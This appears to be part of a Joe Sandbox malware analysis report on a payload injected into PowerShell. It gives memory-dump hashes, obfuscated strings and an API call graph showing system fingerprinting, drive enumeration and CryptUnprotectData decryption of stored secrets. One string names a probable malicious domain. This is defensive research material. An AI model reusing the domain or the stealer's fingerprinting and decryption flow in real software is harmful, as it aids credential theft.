                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2825857601
                                                                                                • Opcode ID: b4f16bfb27ac3dc87b671f6e1bcebc2bf91f152cf9ce6683fd94f7e219e36872
                                                                                                • Instruction ID: ae9a695999bafb7b4c1fb28207dffcbc1f48389dd4db67ae2bfe7550aad6fd4c
                                                                                                • Opcode Fuzzy Hash: b4f16bfb27ac3dc87b671f6e1bcebc2bf91f152cf9ce6683fd94f7e219e36872
                                                                                                • Instruction Fuzzy Hash: 08418735E00609DFEBA8CF18C448BA97BF2BB40751F18806EE4198F6A0C774D984CB91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2825857601
                                                                                                • Opcode ID: 3837c761ca1ee0fadfa4e714c7d38bdfe075074bff30f72e69c67035fd962ed6
                                                                                                • Instruction ID: 239f60d975e123f3e879aeba50515debb964839f50d3669d65f94aaa5b9628ab
                                                                                                • Opcode Fuzzy Hash: 3837c761ca1ee0fadfa4e714c7d38bdfe075074bff30f72e69c67035fd962ed6
                                                                                                • Instruction Fuzzy Hash: 8031B231E00208DFEFB48F64C544B7A7FF6AF80250F15806AE6058B255DB79D988CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2825857601
                                                                                                • Opcode ID: 6988293ea549fd9203bfac1bc54c8fd7673cb1039268e01c77b4adb4e25085a8
                                                                                                • Instruction ID: 99e31e9dcfd883f05f9b279823c02e388e0382bf964f3e431cf1951d62281ac6
                                                                                                • Opcode Fuzzy Hash: 6988293ea549fd9203bfac1bc54c8fd7673cb1039268e01c77b4adb4e25085a8
                                                                                                • Instruction Fuzzy Hash: F131AB3AE04709DFEFB4AE25C544BBABFF6AF44610F18856AD9048B240D731DD44CBA1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$tP^q$tP^q
                                                                                                • API String ID: 0-3859475322
                                                                                                • Opcode ID: 094cf651185cc10a14289a4bd81107574f7de233180c775b03c9515b95957f2a
                                                                                                • Instruction ID: eccee8784d8792b07e89fddbb9f0c0c71a41813d46dea0589de071b9a6bc0dfc
                                                                                                • Opcode Fuzzy Hash: 094cf651185cc10a14289a4bd81107574f7de233180c775b03c9515b95957f2a
                                                                                                • Instruction Fuzzy Hash: F3A12531F142188FDBA49F68C80476ABFE2AFE9711B24C46AE905DF281DB31D845C7E1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2541532402.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_68e0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                • API String ID: 0-1420252700
                                                                                                • Opcode ID: 058948824d2d9a1b469eae8f993ac68f17e0527f0e97359b2defad85c5fa47a5
                                                                                                • Instruction ID: 579d38882743aa13916c83b070149cfc0aefca15d39af2c595064c6d1656eba8
                                                                                                • Opcode Fuzzy Hash: 058948824d2d9a1b469eae8f993ac68f17e0527f0e97359b2defad85c5fa47a5
                                                                                                • Instruction Fuzzy Hash: 5CC16FB4B002189FDB54DB54C894B99BBB2AF85304F50C1D4D649AB385CF71EE86CF91
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$tP^q$$^q
                                                                                                • API String ID: 0-1137240099
                                                                                                • Opcode ID: dcd89cd87a643402295cfe3c6ce8e790eaf78e54236ebd23cdd1414208f34c56
                                                                                                • Instruction ID: e65af476b5739547c3c4d0f82fb698dc5334e9f068325e66206f165dde0370d8
                                                                                                • Opcode Fuzzy Hash: dcd89cd87a643402295cfe3c6ce8e790eaf78e54236ebd23cdd1414208f34c56
                                                                                                • Instruction Fuzzy Hash: 1F415B31E052049FDB648FA8C845A6ABFE2BF85314F1484AAD814EF291C772DC08C7A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.2545375150.0000000006FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FE0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6fe0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: $^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-2125118731
                                                                                                • Opcode ID: cca2a0e9646a36677d31ab4c24b7cf98448e13d6141620459eb00a4bb6c213af
                                                                                                • Instruction ID: 39f5132af5a36400bcb7c0d7529c445ca9c1bb8d10c024f594fdf0402e45049d
                                                                                                • Opcode Fuzzy Hash: cca2a0e9646a36677d31ab4c24b7cf98448e13d6141620459eb00a4bb6c213af
                                                                                                • Instruction Fuzzy Hash: CF213733F103045FEBA4556A8809B37AFD65BD0711F64C42A9645CF2C5CD71D845C2E1

                                                                                                Execution Graph

                                                                                                Execution Coverage:7.9%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:25.4%
                                                                                                Total number of Nodes:193
                                                                                                Total number of Limit Nodes:15
                                                                                                execution_graph 14014 3ae678 14015 3ae690 14014->14015 14017 3ae72f 14015->14017 14020 3adcd0 LdrInitializeThunk 14015->14020 14021 3adcd0 LdrInitializeThunk 14017->14021 14019 3ae818 14020->14017 14021->14019 14023 3a1bf2 CoSetProxyBlanket 14024 3ae372 14025 3ae390 14024->14025 14025->14025 14026 3ae3ce 14025->14026 14028 3adcd0 LdrInitializeThunk 14025->14028 14028->14026 14029 398130 14030 398160 14029->14030 14033 3981ae 14030->14033 14037 3adcd0 LdrInitializeThunk 14030->14037 14031 3982b0 14033->14031 14036 3982ae 14033->14036 14038 3adcd0 LdrInitializeThunk 14033->14038 14036->14036 14039 3abdd0 14036->14039 14037->14033 14038->14036 14040 3abde3 14039->14040 14041 3abdf4 14039->14041 14042 3abde8 RtlFreeHeap 14040->14042 14041->14031 14042->14041 14048 3adf29 14050 3ae0af 14048->14050 14049 3ae2ee 14050->14049 14052 3adcd0 LdrInitializeThunk 14050->14052 14052->14049 14053 3a0fa9 14054 3a0fde SysAllocString 14053->14054 14056 3a118d 14054->14056 14061 37d92e 14062 37d936 14061->14062 14065 382ae0 14062->14065 14064 37d943 14074 382af9 14065->14074 14066 382b00 14066->14064 14067 3abdd0 RtlFreeHeap 14067->14074 14068 38325f RtlExpandEnvironmentStrings 14068->14074 14069 3834f3 RtlExpandEnvironmentStrings 14069->14074 14070 3adcd0 LdrInitializeThunk 14070->14074 14071 3836e6 RtlExpandEnvironmentStrings 14071->14074 14074->14066 14074->14067 14074->14068 14074->14069 14074->14070 14074->14071 14075 3b0ac0 14074->14075 14079 3b1220 14074->14079 14076 3b0ae0 14075->14076 14077 3b0c0e 14076->14077 14085 3adcd0 LdrInitializeThunk 14076->14085 14077->14074 14080 3b1240 14079->14080 14083 3b129e 14080->14083 14086 3adcd0 LdrInitializeThunk 14080->14086 14081 3b134e 14081->14074 14083->14081 14087 3adcd0 LdrInitializeThunk 14083->14087 14085->14077 14086->14083 14087->14081 14088 392de0 14089 392df4 14088->14089 14091 392edc 14088->14091 14092 392f20 14089->14092 14093 392f30 14092->14093 14093->14093 14096 3b0e20 14093->14096 14095 39300f 14097 3b0e40 14096->14097 14098 3b0f7e 14097->14098 14100 3adcd0 LdrInitializeThunk 14097->14100 14098->14095 14100->14098 14101 37e9aa 14102 37e9d0 14101->14102 14107 3a8810 14102->14107 14104 37eac3 14105 3a8810 12 API calls 14104->14105 14106 37ecb6 14105->14106 14106->14106 14108 3a8840 CoCreateInstance 14107->14108 14110 3a8a79 SysAllocString 14108->14110 14111 3a9007 14108->14111 14114 3a8b3e 14110->14114 14112 3a9017 GetVolumeInformationW 14111->14112 14122 3a903c 14112->14122 14115 3a8ff6 SysFreeString 14114->14115 14116 3a8b46 CoSetProxyBlanket 14114->14116 14115->14111 14117 3a8fec 14116->14117 14118 3a8b66 SysAllocString 14116->14118 14117->14115 14120 3a8c70 14118->14120 14120->14120 14121 3a8c86 SysAllocString 14120->14121 14124 3a8caa 14121->14124 14122->14104 14123 3a8fd9 SysFreeString SysFreeString 14123->14117 14124->14123 14125 3a8fcf SysFreeString 14124->14125 14126 3a8cee VariantInit 14124->14126 14125->14123 14128 3a8d40 14126->14128 14127 3a8fba VariantClear 14127->14125 14128->14127 14129 3a6f18 14130 3a6f30 14129->14130 14131 3a6f45 GetUserDefaultUILanguage 14130->14131 14132 3a6f65 14131->14132 14133 37df94 14134 37e020 14133->14134 14134->14134 14135 37e09e 14134->14135 14139 3adcd0 LdrInitializeThunk 14134->14139 14138 3adcd0 LdrInitializeThunk 14135->14138 14138->14135 14139->14135 14140 378710 14142 37871f 14140->14142 14141 378986 ExitProcess 14142->14141 14143 378734 GetCurrentProcessId GetCurrentThreadId 14142->14143 14151 378978 14142->14151 14145 37875b SHGetSpecialFolderPathW 14143->14145 14146 378759 14143->14146 14147 378830 14145->14147 14146->14145 14147->14147 14148 3788a6 GetForegroundWindow 14147->14148 14149 3788bb 14148->14149 14150 37896f 14149->14150 14155 37c9f0 CoInitializeEx 14149->14155 14150->14151 14156 3adc20 14151->14156 14159 3af1d0 14156->14159 14158 3adc25 FreeLibrary 14158->14141 14160 3af1d9 14159->14160 14160->14158 14161 39df11 14162 39df1b 14161->14162 14163 39dfe6 GetPhysicallyInstalledSystemMemory 14162->14163 14164 39e010 14163->14164 14164->14164 14165 3953d0 14166 395420 14165->14166 14166->14166 14167 395436 RtlExpandEnvironmentStrings 14166->14167 14169 395480 14167->14169 14168 395507 14169->14168 14170 3954e6 RtlExpandEnvironmentStrings 14169->14170 14171 395525 14169->14171 14170->14168 14170->14171 14171->14171 14172 3b0e20 LdrInitializeThunk 14171->14172 14177 395651 14172->14177 14173 3957e8 14174 3957d7 14174->14173 14179 3931e0 14174->14179 14176 3957c1 GetLogicalDrives 14178 3b0e20 LdrInitializeThunk 14176->14178 14177->14173 14177->14174 14177->14176 14177->14177 14178->14174 14191 3b0c70 14179->14191 14181 393910 14181->14173 14183 393896 14184 3abdd0 RtlFreeHeap 14183->14184 14186 3938a6 14184->14186 14185 393220 14185->14181 14189 3932ca 14185->14189 14195 3adcd0 LdrInitializeThunk 14185->14195 14186->14181 14197 3adcd0 LdrInitializeThunk 14186->14197 14189->14183 14190 3abdd0 RtlFreeHeap 14189->14190 14196 3adcd0 LdrInitializeThunk 14189->14196 14190->14189 14192 3b0c90 14191->14192 14193 3b0dce 14192->14193 14198 3adcd0 LdrInitializeThunk 14192->14198 14193->14185 14195->14185 14196->14189 14197->14186 14198->14193 14199 3aded3 14200 3adedc GetForegroundWindow 14199->14200 14201 3adeef 14200->14201 14202 3a84d0 14203 3a84f5 14202->14203 14207 3a85b6 14203->14207 14211 3adcd0 LdrInitializeThunk 14203->14211 14204 3a87a2 14207->14204 14208 3a86a1 14207->14208 14210 3adcd0 LdrInitializeThunk 14207->14210 14208->14204 14212 3adcd0 LdrInitializeThunk 14208->14212 14210->14207 14211->14203 14212->14208 14213 3891d6 14214 3891e2 14213->14214 14215 3890b2 14213->14215 14215->14213 14215->14214 14216 3b0e20 LdrInitializeThunk 14215->14216 14216->14215 14217 3a054b SysFreeString 14218 3a068e 14217->14218 14219 37ca45 CoInitializeSecurity CoInitializeSecurity 14220 39e2cd 14222 39e300 14220->14222 14221 39e3de 14222->14221 14224 3adcd0 LdrInitializeThunk 14222->14224 14224->14221 14225 38a5c1 14227 38a5c0 14225->14227 14227->14225 14231 38a633 14227->14231 14232 3b10a0 14227->14232 14238 3b0fd0 14227->14238 14230 38a992 CryptUnprotectData 14230->14231 14231->14230 14242 3adcd0 LdrInitializeThunk 14231->14242 14233 3b10c0 14232->14233 14233->14233 14236 3b111e 14233->14236 14243 3adcd0 LdrInitializeThunk 14233->14243 14234 3b11ce 14234->14227 14236->14234 14244 3adcd0 LdrInitializeThunk 14236->14244 14239 3b0ff0 14238->14239 14239->14239 14240 3b104e 14239->14240 14245 3adcd0 LdrInitializeThunk 14239->14245 14240->14227 14242->14231 14243->14236 14244->14234 14245->14240 14246 3abe00 14247 3abe20 14246->14247 14250 3abeb8 14247->14250 14254 3adcd0 LdrInitializeThunk 14247->14254 14248 3ac0d1 14250->14248 14253 3abffe 14250->14253 14255 3adcd0 LdrInitializeThunk 14250->14255 14251 3abdd0 RtlFreeHeap 14251->14248 14253->14251 14254->14250 14255->14253 14256 37cf4b 14262 379600 14256->14262 14258 37cf57 CoUninitialize 14259 37cf80 14258->14259 14260 37d368 CoUninitialize 14259->14260 14261 37d390 14260->14261 14261->14261 14263 379614 14262->14263 14263->14258
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: !$#$#$%$'$)$)$+$-$.$/$7$8$9$9$9$9$9$9$9$;$D$D$D$D$D$D$D$D$D$F$F$F$F$F$F$F$F$G$G$G$G$G$G$H$J$K$N$P$R$S$T$T$U$U$U$U$V$V$V$W$Xov$Z$[$[$[$\$]$]$^$_$`$`$b$d$f$f$h$i$i$j$k$m$o$p$p$p$q$q$r$r$r$s$s$t$u$v$v$w$w$w$x$x$y$y$z${$|$~$~
                                                                                                • API String ID: 0-1322636185
                                                                                                • Opcode ID: c2d522dffdd5e6549540950ae7a0b35281b09f1c0cd4b30aad118b7135e49f27
                                                                                                • Instruction ID: 9fe742c8bdae5ececa7eb43565f2fac5425b082e48f4d4799ebc16ac959a1b57
                                                                                                • Opcode Fuzzy Hash: c2d522dffdd5e6549540950ae7a0b35281b09f1c0cd4b30aad118b7135e49f27
                                                                                                • Instruction Fuzzy Hash: 0613DE7150C7D08AD336AB38884439FBBD16BD6324F198AADE5E98B3C2D7788905C753

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 447 3a8810-3a883a 448 3a8840-3a8867 447->448 448->448 449 3a8869-3a887f 448->449 450 3a8880-3a88ad 449->450 450->450 451 3a88af-3a88ef 450->451 452 3a88f0-3a8902 451->452 452->452 453 3a8904-3a8920 452->453 455 3a8922-3a892f 453->455 456 3a8974-3a897f 453->456 457 3a8930-3a895b 455->457 458 3a8980-3a8a13 456->458 457->457 459 3a895d-3a896a 457->459 458->458 460 3a8a19-3a8a73 CoCreateInstance 458->460 459->456 461 3a8a79-3a8ab2 460->461 462 3a9007-3a903a call 3af550 GetVolumeInformationW 460->462 464 3a8ac0-3a8b13 461->464 467 3a903c-3a9040 462->467 468 3a9044-3a9046 462->468 464->464 466 3a8b15-3a8b40 SysAllocString 464->466 471 3a8ff6-3a9003 SysFreeString 466->471 472 3a8b46-3a8b60 CoSetProxyBlanket 466->472 467->468 469 3a9067-3a9072 468->469 473 3a907e-3a9094 469->473 474 3a9074-3a907b 469->474 471->462 475 3a8fec-3a8ff2 472->475 476 3a8b66-3a8b84 472->476 477 3a90a0-3a9116 473->477 474->473 475->471 478 3a8b90-3a8bea 476->478 477->477 479 3a9118-3a912f 477->479 478->478 480 3a8bec-3a8c62 SysAllocString 478->480 481 3a9130-3a9155 479->481 482 3a8c70-3a8c84 480->482 481->481 483 3a9157-3a917e call 3900d0 481->483 482->482 484 3a8c86-3a8cac SysAllocString 482->484 487 3a9180-3a9187 483->487 490 3a8fd9-3a8fe8 SysFreeString * 2 484->490 491 3a8cb2-3a8cd4 484->491 487->487 489 3a9189-3a919c 487->489 492 3a91a2-3a91b5 call 378090 489->492 493 3a9050-3a9061 489->493 490->475 498 3a8cda-3a8cdd 491->498 499 3a8fcf-3a8fd6 SysFreeString 491->499 492->493 493->469 495 3a91ba-3a91c1 493->495 498->499 500 3a8ce3-3a8ce8 498->500 499->490 500->499 501 3a8cee-3a8d3f VariantInit 500->501 502 3a8d40-3a8d5f 501->502 502->502 503 3a8d61-3a8d7d 502->503 505 3a8fba-3a8fcb VariantClear 503->505 506 3a8d83-3a8d89 503->506 505->499 506->505 507 3a8d8f-3a8d99 506->507 508 3a8d9b-3a8da2 507->508 509 3a8ddd-3a8ddf 507->509 510 3a8dbc-3a8dc0 508->510 511 3a8de1-3a8df9 call 378010 509->511 512 3a8dc2-3a8dcb 510->512 513 3a8db0 510->513 519 3a8dff-3a8e0b 511->519 520 3a8f54-3a8f74 511->520 516 3a8dcd-3a8dd0 512->516 517 3a8dd2-3a8dd6 512->517 515 3a8db1-3a8dba 513->515 515->510 515->511 516->515 517->515 521 3a8dd8-3a8ddb 517->521 519->520 522 3a8e11-3a8e19 519->522 523 3a8fad-3a8fb6 call 378020 520->523 524 3a8f76-3a8f8c 520->524 521->515 525 3a8e20-3a8e2a 522->525 523->505 524->523 526 3a8f8e-3a8fa4 524->526 528 3a8e2c-3a8e31 525->528 529 3a8e40-3a8e46 525->529 526->523 530 3a8fa6-3a8fa9 526->530 532 3a8f00-3a8f06 528->532 533 3a8e48-3a8e4b 529->533 534 3a8e67-3a8e75 529->534 530->523 538 3a8f08-3a8f0e 532->538 533->534 535 3a8e4d-3a8e62 533->535 536 3a8f1a-3a8f22 534->536 537 3a8e7b-3a8e7e 534->537 535->532 541 3a8f28-3a8f2b 536->541 542 3a8f24-3a8f26 536->542 537->536 539 3a8e84-3a8ef4 537->539 538->520 540 3a8f10-3a8f12 538->540 539->532 540->525 545 3a8f18 540->545 543 3a8f2d-3a8f4e 541->543 544 3a8f50-3a8f52 541->544 542->538 543->532 544->532 545->520
                                                                                                APIs
                                                                                                • CoCreateInstance.OLE32(003B368C,00000000,00000001,003B367C,00000000), ref: 003A8A6B
                                                                                                • SysAllocString.OLEAUT32(5DEB63D0), ref: 003A8B1A
                                                                                                • CoSetProxyBlanket.COMBASE(80B0E407,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 003A8B58
                                                                                                • SysAllocString.OLEAUT32(86D080D8), ref: 003A8BF1
                                                                                                • SysAllocString.OLEAUT32(87438537), ref: 003A8C8B
                                                                                                • VariantInit.OLEAUT32(FEF9F8F3), ref: 003A8CF7
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocString$BlanketCreateInitInstanceProxyVariant
                                                                                                • String ID: $z3$*+$:$NO$TU$jQG$QS$WQ
                                                                                                • API String ID: 65563702-3151449071
                                                                                                • Opcode ID: 00d48cee76c334d205f5b61410c6c0bfb4ac2826a7a343f9f34b4fd59747b032
                                                                                                • Instruction ID: 39c43aa14d4923d833ddbf466430eff6eb53e0dbc7204dd96f0842dbc79ccaec
                                                                                                • Opcode Fuzzy Hash: 00d48cee76c334d205f5b61410c6c0bfb4ac2826a7a343f9f34b4fd59747b032
                                                                                                • Instruction Fuzzy Hash: C0422771A183518FD314CF68C8817ABBBE6EFC5314F198A2DE9959B380DB74D805CB82

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 675 37cf4b-37cf76 call 379600 CoUninitialize 678 37cf80-37cfa6 675->678 678->678 679 37cfa8-37cfbf 678->679 680 37cfc0-37cfda 679->680 680->680 681 37cfdc-37d03f 680->681 682 37d040-37d085 681->682 682->682 683 37d087-37d098 682->683 684 37d0bb-37d0c3 683->684 685 37d09a-37d0a8 683->685 687 37d0c5-37d0c6 684->687 688 37d0db-37d0e5 684->688 686 37d0b0-37d0b9 685->686 686->684 686->686 691 37d0d0-37d0d9 687->691 689 37d0e7-37d0eb 688->689 690 37d0fb-37d103 688->690 692 37d0f0-37d0f9 689->692 693 37d105-37d106 690->693 694 37d11b-37d125 690->694 691->688 691->691 692->690 692->692 695 37d110-37d119 693->695 696 37d127-37d12b 694->696 697 37d13b-37d147 694->697 695->694 695->695 698 37d130-37d139 696->698 699 37d161-37d27b 697->699 700 37d149-37d14b 697->700 698->697 698->698 702 37d280-37d2b5 699->702 701 37d150-37d15d 700->701 701->701 703 37d15f 701->703 702->702 704 37d2b7-37d2d8 702->704 703->699 705 37d2e0-37d32b 704->705 705->705 706 37d32d-37d387 call 37b690 call 379600 CoUninitialize 705->706 711 37d390-37d3b6 706->711 711->711 712 37d3b8-37d3cf 711->712 713 37d3d0-37d3ea 712->713 713->713 714 37d3ec-37d44f 713->714 715 37d450-37d495 714->715 715->715 716 37d497-37d4a8 715->716 717 37d4cb-37d4d3 716->717 718 37d4aa-37d4b8 716->718 720 37d4d5-37d4d6 717->720 721 37d4eb-37d4f5 717->721 719 37d4c0-37d4c9 718->719 719->717 719->719 724 37d4e0-37d4e9 720->724 722 37d4f7-37d4fb 721->722 723 37d50b-37d513 721->723 725 37d500-37d509 722->725 726 37d515-37d516 723->726 727 37d52b-37d535 723->727 724->721 724->724 725->723 725->725 728 37d520-37d529 726->728 729 37d537-37d53b 727->729 730 37d54b-37d557 727->730 728->727 728->728 731 37d540-37d549 729->731 732 37d571-37d68b 730->732 733 37d559-37d55b 730->733 731->730 731->731 735 37d690-37d6c5 732->735 734 37d560-37d56d 733->734 734->734 736 37d56f 734->736 735->735 737 37d6c7-37d6e8 735->737 736->732 738 37d6f0-37d73b 737->738 738->738 739 37d73d-37d77f call 37b690 738->739
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: Uninitialize
                                                                                                • String ID: 'T0Z$.H;N$2C%M$5D1J$;L`R$>\-b$NO$eXy^$imbibelubmbe.click$qG!A
                                                                                                • API String ID: 3861434553-1212486564
                                                                                                • Opcode ID: 74614e2b6a141ae05f5f74011b4505902c678f0f2b3b5d71593dc6c9937393ab
                                                                                                • Instruction ID: 4376c06c4860ca806a2f8e4a4b5779570ac33f411475131e0d8272404d0e2099
                                                                                                • Opcode Fuzzy Hash: 74614e2b6a141ae05f5f74011b4505902c678f0f2b3b5d71593dc6c9937393ab
                                                                                                • Instruction Fuzzy Hash: 8712F0B190D3D08BD336CF2988A439BBFE1AF97704F2A8A5CD5C95B241D7790806CB52

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 798 3953d0-39541f 799 395420-395434 798->799 799->799 800 395436-39547b RtlExpandEnvironmentStrings 799->800 801 395480-3954bb 800->801 801->801 802 3954bd-3954c8 801->802 803 395518-395524 802->803 804 3954cf-3954d4 802->804 805 39550f-395515 call 378020 802->805 806 395525-39552d 802->806 807 395507 802->807 811 3954dd 804->811 812 3954d6-3954db 804->812 805->803 809 39552f-395534 806->809 810 395536 806->810 807->805 814 39553d-395575 call 378010 809->814 810->814 815 3954e0-395500 call 378010 RtlExpandEnvironmentStrings 811->815 812->815 820 395580-3955e8 814->820 815->803 815->805 815->806 815->807 820->820 821 3955ea-3955f2 820->821 822 395611-39561e 821->822 823 3955f4-3955f9 821->823 825 395641-395659 call 3b0e20 822->825 826 395620-395624 822->826 824 395600-39560f 823->824 824->822 824->824 830 395809-39580f 825->830 831 3957e8-3957f2 825->831 832 395818-39581e call 378020 825->832 833 39592b 825->833 834 3957fa 825->834 835 395931-395949 825->835 836 395670-395678 825->836 837 395660-395667 825->837 838 395800-395806 call 378020 825->838 839 395810 825->839 840 395812 825->840 841 395827-3958d7 825->841 827 395630-39563f 826->827 827->825 827->827 830->839 831->834 832->841 847 395950-395962 835->847 844 39567a-39567f 836->844 845 395681 836->845 837->836 838->830 843 3958e0-395909 841->843 843->843 850 39590b-39591b call 3931e0 843->850 851 395688-395735 call 378010 844->851 845->851 847->847 848 395964-3959e7 847->848 853 3959f0-395a0e 848->853 857 395920-395923 850->857 859 395740-395761 851->859 853->853 856 395a10-395a33 call 393070 853->856 857->833 859->859 861 395763-39576b 859->861 863 39576d-395774 861->863 864 395791-39579e 861->864 865 395780-39578f 863->865 866 3957c1-3957e1 GetLogicalDrives call 3b0e20 864->866 867 3957a0-3957a4 864->867 865->864 865->865 866->830 866->831 866->832 866->833 866->834 866->835 866->838 866->839 866->840 868 3957b0-3957bf 867->868 868->866 868->868
                                                                                                APIs
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 00395468
                                                                                                • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000), ref: 003954F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000A.00000002.2888989484.0000000000371000.00000020.00000400.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                • Associated: 0000000A.00000002.2888939969.0000000000370000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890092446.00000000003B2000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890166871.00000000003B5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000A.00000002.2890291339.00000000003C3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_10_2_370000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                • String ID: *+$B1SN$CC$TF$V1SN$tu
                                                                                                • API String ID: 237503144-2259541044
                                                                                                • Opcode ID: c03f7fe97be319c260a2f12c91bd2f0b2d54c79bdde90a9873d4ac5401dc08a0
                                                                                                • Instruction ID: 76c0b134325733bf5243bd41b105366030348cd25c1cc1c4bc31d886bcf70727
                                                                                                • Opcode Fuzzy Hash: c03f7fe97be319c260a2f12c91bd2f0b2d54c79bdde90a9873d4ac5401dc08a0
                                                                                                • Instruction Fuzzy Hash: BCE1FCB460C3419FD711DF68D88162BBBE5FBD2354F448A2CF5D98B291E7788906CB82

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
